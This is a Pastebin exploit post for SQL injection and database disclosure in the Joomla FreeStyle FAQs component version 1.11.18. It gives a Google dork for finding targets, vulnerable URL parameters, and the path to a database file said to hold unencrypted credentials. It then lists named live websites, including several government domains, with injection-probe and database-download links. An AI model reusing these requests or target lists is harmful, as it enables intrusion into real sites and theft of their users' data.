Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla FSF FreeStyle FAQs Components 1.11.18 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 03/02/2019
- # Vendor Homepage : freestyle-joomla.com
- # Software Download Link : freestyle-joomla.com/products/support/freestyle-faqs-lite
- # Software Information Link : extensions.joomla.org/extension/freestyle-faqs/
- # Software Version : 1.11.18 and previous versions.
- # Software Technical Requirements : Joomla 3.5 and above PHP 5.3 or later - MySQL 5.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_fsf''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Freestyle FAQ is designed to provide you with a highly customised
- Frequently Asked Questions (FAQs) module on your Joomla website.
- FAQs can be organised in to multiple categories, you can add tags to FAQS
- to allow similar questions from users to be grouped together.
- Provides you with a free comprehensive FAQ solution for your website.
- The product includes a built in glossary, multiple view options and a category listing module.
- ####################################################################
- # Impact :
- ***********
- Joomla FSF FreeStyle FAQs 1.11.18 component for Joomla and other versions
- is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * A DAT file is a generic data file created by a specific application.
- It may contain data in binary or text format (text-based DAT files can be viewed in a text editor).
- DAT files are typically accessed only by the application only by owners.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_fsf&view=faq&catid=&Itemid=[SQL Injection]
- /index.php?option=com_fsf&view=faq&catid=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_fsf&view=faq&catid=1&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_fsf&catid=[ID-NUMBER]&view=faq&Itemid=[ID-NUMBER]&tmpl=component&faqid=[SQL Injection]
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_fsf/database_fsf.dat
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] dtps.gov.za/index.php?option=com_fsf&view=faq&catid=1&Itemid=231&limitstart=10%27
- [+] dtps.gov.za/administrator/components/com_fsf/database_fsf.dat
- [+] han.gov.cv/index.php?option=com_fsf&view=faq&catid=2&Itemid=314%27
- [+] culture.gov.bf/index.php?option=com_fsf&view=faq&catid=0&Itemid=927%27
- [+] zaer.um.ac.ir/index.php?option=com_fsf&view=faq&catid=1&Itemid=589%27
- [+] brmi.org/index.php?option=com_fsf&view=faq&catid=&Itemid=264%27
- [+] solovue.com/index.php?option=com_fsf&catid=1&view=faq&Itemid=155&tmpl=component&faqid=8%27
- [+] goomass.com/index.php?option=com_fsf&view=faq&catid=-4&Itemid=235%27
- [+] dry247.com/dry247/index.php?option=com_fsf&view=faq&catid=1&Itemid=130%27
- [+] penthalaz.ch/v2/index.php?option=com_fsf&view=faq&catid=1&Itemid=1%27
- [+] emekhashaveh.org/index.php?option=com_fsf&view=faq&catid=1&Itemid=597%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: Non-static method SEFConfig::getConfig() should not be
- called statically, assuming $this from incompatible context in /home2
- /solovue/public_html/plugins/system/joomsef/joomsef.php on line 231
- Deprecated: Non-static method FSF_Settings::GetViewSettingsObj()
- should not be called statically, assuming $this from incompatible context in
- /home2/solovue/public_html/components/com_fsf/models/faq.php on line 40
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment